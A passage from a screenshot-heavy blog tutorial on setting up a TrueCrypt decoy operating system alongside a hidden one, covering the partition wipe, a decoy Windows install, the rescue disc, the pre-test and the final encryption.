<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgONuXHD4pZUXXmIjWBgbLAK8diCPP9fvZyGH_k7D0AysO4Wp5ZsVE9I4Oysjq9uRHdcFaQCkAff444w1TnKl3q-he5txP16OWReK59pEy19k_Pj3UcBji87hxNxAO2zk2zQ3igTYVAbmk/s1600/034.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgONuXHD4pZUXXmIjWBgbLAK8diCPP9fvZyGH_k7D0AysO4Wp5ZsVE9I4Oysjq9uRHdcFaQCkAff444w1TnKl3q-he5txP16OWReK59pEy19k_Pj3UcBji87hxNxAO2zk2zQ3igTYVAbmk/s400/034.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~More mouse fun! Your mouse movements feed TrueCrypt's random number generator, which produces the data written over Partition 1, so keep moving it until the wipe starts. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj25dORTxyKwurWDa8KtfACX-uCSYSztfStpzLrlmfmJ2Prb3GHwpL7WIyAJnRYgC6EKZW8Pi-c5k7TKdVRbO4GCvp4ZRWWdvW9xZBUhSBmw41LAqosDWSkin3FeiFkcVRwgg3hE8tZoSg/s1600/035.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="398" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj25dORTxyKwurWDa8KtfACX-uCSYSztfStpzLrlmfmJ2Prb3GHwpL7WIyAJnRYgC6EKZW8Pi-c5k7TKdVRbO4GCvp4ZRWWdvW9xZBUhSBmw41LAqosDWSkin3FeiFkcVRwgg3hE8tZoSg/s400/035.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Wiping
in some cases can take all day/night, even at 3 passes. Other factors
of course include the size and speed of your drive. </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisWvb1UfEnNJHb3tRxDxJUHq9mIyT_CyJpBBW4zBy7TEoaeC8AMZoVMk6d6dMSSqEI4IQymwwu_nT6H0JW36RvZiZSd27ezWmhuxf6Wp5YkdsznDRpcnKlRWkhCGGkDDE0yYJg6zWqHjw/s1600/036.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisWvb1UfEnNJHb3tRxDxJUHq9mIyT_CyJpBBW4zBy7TEoaeC8AMZoVMk6d6dMSSqEI4IQymwwu_nT6H0JW36RvZiZSd27ezWmhuxf6Wp5YkdsznDRpcnKlRWkhCGGkDDE0yYJg6zWqHjw/s400/036.png" width="400" /></a></div>
<br />
~Here is the success dialog: <br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHc5l1iwaQAT2oLWzwr4mMj7MQ2_CJCoKGZh-sz9PqC_wAt0wfGWpGTSZWH9djHOuvSBtsDch1wksoiJIdKfUUMz06lps5rIRaQ2KyoYiboR3uAQij0rQ68M124b8QwhbZ6kg-1M_awwk/s1600/037.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHc5l1iwaQAT2oLWzwr4mMj7MQ2_CJCoKGZh-sz9PqC_wAt0wfGWpGTSZWH9djHOuvSBtsDch1wksoiJIdKfUUMz06lps5rIRaQ2KyoYiboR3uAQij0rQ68M124b8QwhbZ6kg-1M_awwk/s400/037.png" width="400" /></a></div>
<br />
~Click Exit:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-707ELoT6OIZabCu_7sBG3ZPHJ3s9FF8vb1aPoCZZISee-B6VyxCoWqhv2QkUCu4xR6asgdR4FG61qNZfi6-2swJdsBMjMHyZo1kOYC1B6OJjEXYdHIZ4_pjkV4FHllBV-PrYwFQLmq8/s1600/038.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-707ELoT6OIZabCu_7sBG3ZPHJ3s9FF8vb1aPoCZZISee-B6VyxCoWqhv2QkUCu4xR6asgdR4FG61qNZfi6-2swJdsBMjMHyZo1kOYC1B6OJjEXYdHIZ4_pjkV4FHllBV-PrYwFQLmq8/s400/038.png" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~So
now it is time to go ahead and install a fresh copy of Windows on
Partition 1 as a decoy operating system. Just pop a Windows disc in
there and install on Partition 1. (Don't accidentally install onto or
delete Partition 2!!) Once that's done, download TrueCrypt onto the
fresh decoy install and choose Create Volume. Then choose Normal since
this will be the decoy installation and press Next: </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi1QVduCww2aOzHFZoXiI0LyYy8hZ2f5MA7lS31B3xuOJb3sRCbhAnNrpvOGQ9eWx4RstYxKHPmvgsX4B23N9PWU_EU86t-dR85cxEyj13SAbrdLPZutkp76Fap5Jc10z-pMuP2qoXMVw/s1600/039.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi1QVduCww2aOzHFZoXiI0LyYy8hZ2f5MA7lS31B3xuOJb3sRCbhAnNrpvOGQ9eWx4RstYxKHPmvgsX4B23N9PWU_EU86t-dR85cxEyj13SAbrdLPZutkp76Fap5Jc10z-pMuP2qoXMVw/s400/039.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Choose Encrypt the Windows system partition... </div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCDm7gHFHyBhkotP8xOzlyLiE0j5jqm9GHABLxdJQqN4l-ctg3AmsEs8RndwCM9KNx3BCPtUjlOr-icEdxblwn8lQVXkVpjWWycH0EBXIStEPEFVBXSIdFbsLsM3TXOfqeTgJBRJFFhmc/s1600/040.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCDm7gHFHyBhkotP8xOzlyLiE0j5jqm9GHABLxdJQqN4l-ctg3AmsEs8RndwCM9KNx3BCPtUjlOr-icEdxblwn8lQVXkVpjWWycH0EBXIStEPEFVBXSIdFbsLsM3TXOfqeTgJBRJFFhmc/s400/040.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Choose Single-boot</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3I2V7DbiLt_Qtje0he-MKw6VIycwLI5MaCUZVeGLdCkWYhIi0hP7LSV0tOLmOhVQ57F9Bz1HPGpPhHtk-Qerds-BmU5X_1Sl1V7G2jF47nR_5hW7CsCG9KKiQu1BO6F_ls_QWgsdT7qo/s1600/041.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3I2V7DbiLt_Qtje0he-MKw6VIycwLI5MaCUZVeGLdCkWYhIi0hP7LSV0tOLmOhVQ57F9Bz1HPGpPhHtk-Qerds-BmU5X_1Sl1V7G2jF47nR_5hW7CsCG9KKiQu1BO6F_ls_QWgsdT7qo/s400/041.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~<span style="color: red;"><b>Make
sure you select the same encryption algorithm here that you did when
you created the inner volume on Partition 2.</b></span> They must be the same
because both the decoy and hidden operating systems use the same
bootloader and there is a different bootloader for each algorithm.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9OysosNz339GBNceoFNJOYDKSkGZa60xdDhCdMYs_L-ImailazvlnH56pEpK3XNjJYW0qK__gSkzpoVtSWoHnR38QRSPOIcvBKy2Ybpe5uaZwnRxxlUD0-FHjG-dYygAT0yuVPUPEyMs/s1600/042.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9OysosNz339GBNceoFNJOYDKSkGZa60xdDhCdMYs_L-ImailazvlnH56pEpK3XNjJYW0qK__gSkzpoVtSWoHnR38QRSPOIcvBKy2Ybpe5uaZwnRxxlUD0-FHjG-dYygAT0yuVPUPEyMs/s400/042.jpg" width="400" /></a></div>
<br />
<br />
~More
mouse fun! Great to feel like you are a part of the process, huh? :-) Move
that mouse for the greater good of your encryption strength!<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvsSUWOO8xjnzeoZ9lhEg3pCSofCnHexLvlik2ARBGQUsG-ZqvWekpH3alLmGuXK9rxFHxfK8KS_Q4bCbbXtVoov3l3O4I6SgDGO0E-v_kQWY94tPm-GIqtcBiJRxrxTeBzhsT5N05IHM/s1600/043.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvsSUWOO8xjnzeoZ9lhEg3pCSofCnHexLvlik2ARBGQUsG-ZqvWekpH3alLmGuXK9rxFHxfK8KS_Q4bCbbXtVoov3l3O4I6SgDGO0E-v_kQWY94tPm-GIqtcBiJRxrxTeBzhsT5N05IHM/s400/043.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Click Next... </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8TV7IZslhAD3v0KJ3bwvO79TYIoWQYGNk4e9JdQFY58PX0PaCMFOgdX06_kmaK_D20C4keDMVXTMxfhPnZmdvgDhHHQwEttvuQerJkyA5QI1AQEEItV2xmdWBIj2MBWqYVgmRyG4YcSE/s1600/044.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8TV7IZslhAD3v0KJ3bwvO79TYIoWQYGNk4e9JdQFY58PX0PaCMFOgdX06_kmaK_D20C4keDMVXTMxfhPnZmdvgDhHHQwEttvuQerJkyA5QI1AQEEItV2xmdWBIj2MBWqYVgmRyG4YcSE/s400/044.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Somewhere
in there it asks you for the password. Can't remember at which point.
(Oopsie.) Anyway, when it does, you need to enter <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png">Password A</a> for the
decoy operating system. Do you need any more sermons about secure
passphrases and whatnot? Didn't think so. ;)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTxvWWUcSAkBN9CYkKmPlQJs9GQUCHduFkiduHc3Pr9yrxXE-ihc_fdLmr_pu6eFhZkmaetZNB7c7mKNoxmXEkp_EEjC9IHzLtz23no56rNYWXwx_wYyX64Vr3jpV4Ar5V0tB-IyvHO7E/s1600/password.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="56" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTxvWWUcSAkBN9CYkKmPlQJs9GQUCHduFkiduHc3Pr9yrxXE-ihc_fdLmr_pu6eFhZkmaetZNB7c7mKNoxmXEkp_EEjC9IHzLtz23no56rNYWXwx_wYyX64Vr3jpV4Ar5V0tB-IyvHO7E/s320/password.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~It will also ask you about creating a rescue disc. Creating a rescue disc is pretty important, as you can see below. It might sound scary to have it lying around, but the rescue disc still requires the password: it holds the boot loader plus a backup of the (encrypted) volume header, so it is no more of a vulnerability than the boot loader that is already on your hard drive. Just make sure you put it in a safe place so you don't lose it.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrDkZQTnq071_THWkI9SwBiE0QUErkHf_XAWASvFrYRCiup1wVqGFi4xiJiyxhEtTCgohzO7unX1VAxSzHVSJNxlLW7xtz9kLG4gaZaXNHDXzt6ZDTa1LBSij3bmwlvFD5d99Bm4p5ug8/s1600/045.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrDkZQTnq071_THWkI9SwBiE0QUErkHf_XAWASvFrYRCiup1wVqGFi4xiJiyxhEtTCgohzO7unX1VAxSzHVSJNxlLW7xtz9kLG4gaZaXNHDXzt6ZDTa1LBSij3bmwlvFD5d99Bm4p5ug8/s400/045.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~TrueCrypt creates an ISO and then helps you burn it to optical media as a rescue disc: </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm8l0AICce5JzS5DjvwcbL1BZmXWSYcAiZ5-Xx3XuhFex_z7NCobBwwfYPwjceDdxi2wP3vP10fRXvjCZeGs_W7joV0IDZntlU1nbXwysxrRfWlhdy3kDGseMRFnxl_5R4w8KQusZ7kfk/s1600/046.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgm8l0AICce5JzS5DjvwcbL1BZmXWSYcAiZ5-Xx3XuhFex_z7NCobBwwfYPwjceDdxi2wP3vP10fRXvjCZeGs_W7joV0IDZntlU1nbXwysxrRfWlhdy3kDGseMRFnxl_5R4w8KQusZ7kfk/s400/046.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~The rescue disc is verified to make sure it was a good burn: </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1b0ZL5wFXDvw0DoOYotrnGAYjjogb1DX7HKR4X2zDsoiT98o1mFIaIQmHMF-Ry4fklxssFoohYPSOPeum6XHiWspN5DOKijQbWTtqVGl_fwZNdAK1ZZnH8GOHmGzrAHUwcEJmCs9e968/s1600/047.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1b0ZL5wFXDvw0DoOYotrnGAYjjogb1DX7HKR4X2zDsoiT98o1mFIaIQmHMF-Ry4fklxssFoohYPSOPeum6XHiWspN5DOKijQbWTtqVGl_fwZNdAK1ZZnH8GOHmGzrAHUwcEJmCs9e968/s400/047.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Now
we are going to tell TrueCrypt how we want the data wiped from
Partition 1. Wiped again, you say? Yup. The last time we wiped Partition
1 was to wipe the operating system from it after it was copied to the inner
volume of Partition 2. This time TrueCrypt is going to encrypt the decoy
operating system and wipe the unencrypted version of it. If it didn't,
then someone could potentially do forensics on Partition 1 and recover
the unencrypted version of the decoy operating system. This would be
especially bad for those who use their decoy system for activities which
are less sensitive, but sensitive nevertheless. As
stated earlier, the default of 3 passes should be quite adequate.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfGNLAb6TG7Ie_k8xgiVNX3-MnxBHtx_48z23OfyIrRCoi_kt7kw2sPal4mtkWFuZrtY9Uvp_GAzhbah8ePqh57QMyI0ff8u2ws22HPexYHe04QfO3QRWf_UF77NvjrhswqMccVR-0vrE/s1600/048.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfGNLAb6TG7Ie_k8xgiVNX3-MnxBHtx_48z23OfyIrRCoi_kt7kw2sPal4mtkWFuZrtY9Uvp_GAzhbah8ePqh57QMyI0ff8u2ws22HPexYHe04QfO3QRWf_UF77NvjrhswqMccVR-0vrE/s400/048.jpg" width="400" /></a></div>
<br />
~As stated, this will take a while once it actually starts which will happen later...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQ3avs_RSz8ZPyBKeW3NbSNZP4Ve1P5UgUUhYdLr5jXbqMv1qwsYUY_CI0t4Ibfzm6rDMb0jlCIkSqG6pcByVsHcFqyphwKQaDuIT45YWWcOnVKcBR6kS54h8FojIL6XsEx2bV36IbJs/s1600/049.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQ3avs_RSz8ZPyBKeW3NbSNZP4Ve1P5UgUUhYdLr5jXbqMv1qwsYUY_CI0t4Ibfzm6rDMb0jlCIkSqG6pcByVsHcFqyphwKQaDuIT45YWWcOnVKcBR6kS54h8FojIL6XsEx2bV36IbJs/s400/049.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~TrueCrypt is going to test everything before doing the final encryption and wipe. Click Test:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfeY7Cg-Y-h9KQ2rXfy2ITtcxH0AyJeyUSRTySkkK_MJbCxwWFh5u5Szge25LqjAGac0M8sapzavrnp5YKI8g1OVRc_1RajrO555lxQ62tRNU3haNrfPPr6h9HYerXuQhSE9HmoCt1gdo/s1600/050.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfeY7Cg-Y-h9KQ2rXfy2ITtcxH0AyJeyUSRTySkkK_MJbCxwWFh5u5Szge25LqjAGac0M8sapzavrnp5YKI8g1OVRc_1RajrO555lxQ62tRNU3haNrfPPr6h9HYerXuQhSE9HmoCt1gdo/s400/050.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~TrueCrypt
informs you that this is only a test and that actual encryption
will not take place. However, if the test fails, then Windows may fail to
start. If this does occur, you can come back here and read the various
options for repair. Hopefully, you will be good though.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv7Lw_rB_k1xPKbKDFHngb5jhSAaD9QcCQiT_8Do6LY0TecUtg4Gev16g0goYsYKiiL7gySeCL2MVlTIGKe6Xg5ViJCtKPWaxlyxq93kHL5johvh8QvDxjyKPztsHU0LARhTAYmyxERn8/s1600/051.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhv7Lw_rB_k1xPKbKDFHngb5jhSAaD9QcCQiT_8Do6LY0TecUtg4Gev16g0goYsYKiiL7gySeCL2MVlTIGKe6Xg5ViJCtKPWaxlyxq93kHL5johvh8QvDxjyKPztsHU0LARhTAYmyxERn8/s400/051.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~I scrolled down and took another photo:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNHnoZ8GvQYzbRkzlsdCHly0WCwm_5c5mZ_3EPUgah9J9T2rUibbpK4CpWjGWvYLemdsYd7ryCDiljFhmuyEw4OZmCR2qTEt0pF9Y1AQ5-724-9DTRt6pY7JbfcEna-iE52QXebmXptkU/s1600/052.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNHnoZ8GvQYzbRkzlsdCHly0WCwm_5c5mZ_3EPUgah9J9T2rUibbpK4CpWjGWvYLemdsYd7ryCDiljFhmuyEw4OZmCR2qTEt0pF9Y1AQ5-724-9DTRt6pY7JbfcEna-iE52QXebmXptkU/s400/052.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~Time
to test, then. Click Yes and then <b>when your computer reboots it will
prompt you for <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja9MGuX1z0H0bhEd7tzdbcMSZl7T1t0st7k5o-EhPu1cT1g5Fo4TXBT12kk2UGO-91s2TzQKK86AYPSX_FoCINCF4Ti-M72pADYCS1KC83QRhLCEdx8K_XyZYJWR1t8sSzRjT5Uqg-lts/s1600/TC_boot2.png">Password A</a></b>. If you have any trouble, see the 2 previous
images.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTtygnZ9XP8_KUeSnfU34BZbpM8AttV_r6Wxs_DwVgau5B9vIW_ql4_k3rv93Hm-BkcdEfwtCA-T6GSZI9oLx1xzUKL7MlUOg3tq61PxGoGW4DwYR8Sb4Em_qnjg5DpmwdctKw5QNqfgY/s1600/053.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTtygnZ9XP8_KUeSnfU34BZbpM8AttV_r6Wxs_DwVgau5B9vIW_ql4_k3rv93Hm-BkcdEfwtCA-T6GSZI9oLx1xzUKL7MlUOg3tq61PxGoGW4DwYR8Sb4Em_qnjg5DpmwdctKw5QNqfgY/s400/053.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~After you've rebooted and typed Password A, hopefully
this is what you are now looking at. TrueCrypt warns here that in the
event of power loss or a system crash during the encryption process, data on the decoy operating
system may be gone forever. I didn't mention backups sooner
because I am assuming that you followed my advice in Part 2 and used a clean
system with a fresh Windows install. So hopefully, you don't even need backups.
If you do, read the instructions here on how to defer, back up your data and then
resume. If you don't need to make backups, then click Encrypt.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCIYmScIaEuFcwZASXyn91hoEDwYv6g5bb3dFnfEuvWyL2JrSKAJFfr807qzBe1oj89jGIT1QHJlTzql_q5Pp55tKiQYsQhYdPKKcz-JZXFFKpBTBZgGt8aiQWEDK6U0JuxFkiAm_3ubQ/s1600/054.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCIYmScIaEuFcwZASXyn91hoEDwYv6g5bb3dFnfEuvWyL2JrSKAJFfr807qzBe1oj89jGIT1QHJlTzql_q5Pp55tKiQYsQhYdPKKcz-JZXFFKpBTBZgGt8aiQWEDK6U0JuxFkiAm_3ubQ/s400/054.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~The
next 3 photos provide instructions on how to troubleshoot any potential
future booting issues with the rescue disc... Press OK.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie35hMZL_fKgx2DpHJ_soi2og2n6F-6Blx8Dam0NUz8vVGTSuF5r-OTeXprYgDJ-d8i6tZmaQSNMD45AO597WKUnRz4x1qPZQQiHyuSB6dh-lr-bfw-d0EK7gLwugzPV8U-JiSThNtp4A/s1600/055.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie35hMZL_fKgx2DpHJ_soi2og2n6F-6Blx8Dam0NUz8vVGTSuF5r-OTeXprYgDJ-d8i6tZmaQSNMD45AO597WKUnRz4x1qPZQQiHyuSB6dh-lr-bfw-d0EK7gLwugzPV8U-JiSThNtp4A/s400/055.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibgiSiHD0vHsjo_52AEpxcFyDE-IJhY_pMUDLnwZ3JI_OYobiYeGghsG8fHsXDSl4J1kUE4xFZ574LPmoe_j2CorTn0dhq2itP6CjRVmXZnKrOMzNzq6ap7Llq9yQ4lr7J8_qd335fQy4/s1600/056.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibgiSiHD0vHsjo_52AEpxcFyDE-IJhY_pMUDLnwZ3JI_OYobiYeGghsG8fHsXDSl4J1kUE4xFZ574LPmoe_j2CorTn0dhq2itP6CjRVmXZnKrOMzNzq6ap7Llq9yQ4lr7J8_qd335fQy4/s400/056.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkO-040Nvc087qgSNUo6u3Dz7Mcp4LSjYY07fG8whQZ_y7x5VJeNHUk4ZXT8TeKUl143ukO4thwkwrazXPEPb716CToK1Q_doHFljnKg9gPlxdQ4CIX2_QFMMVo87ttfvaOaQtc7KEUPA/s1600/057.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkO-040Nvc087qgSNUo6u3Dz7Mcp4LSjYY07fG8whQZ_y7x5VJeNHUk4ZXT8TeKUl143ukO4thwkwrazXPEPb716CToK1Q_doHFljnKg9gPlxdQ4CIX2_QFMMVo87ttfvaOaQtc7KEUPA/s400/057.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
~TrueCrypt
is now encrypting your decoy operating system on Partition 1! <span style="color: lime;">Folks,
this is even more amazing than it may seem. It's actually quite
remarkable.</span> Think about it. What's happening here is that <b>while booted into Windows</b> (not a live environment!) TrueCrypt is encrypting the <i>currently booted</i> Windows AND <i>wiping the non-encrypted version of it</i>
all on the fly without even rebooting. WHAT? How is that even possible?
It's more magic from the TrueCrypt people!! If this doesn't make you
feel like <a href="http://www.truecrypt.org/donations/?lnk=21141" target="_blank">donating</a>, what will???!!!</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpei6LUciqO3-rRgURrQ6VuqMVAUxoIDI5b5g1iRCewP71MRxmJCg2ZDsX6KAEoP1xNlCSys2_J9B-d7Fp3H5r_IhEvSiXWsZfVh4zrkkRZUFd_irQ8Q1np1-cPWROcQAv4KhGCQt-YLc/s1600/058.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpei6LUciqO3-rRgURrQ6VuqMVAUxoIDI5b5g1iRCewP71MRxmJCg2ZDsX6KAEoP1xNlCSys2_J9B-d7Fp3H5r_IhEvSiXWsZfVh4zrkkRZUFd_irQ8Q1np1-cPWROcQAv4KhGCQt-YLc/s400/058.jpg" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
~If
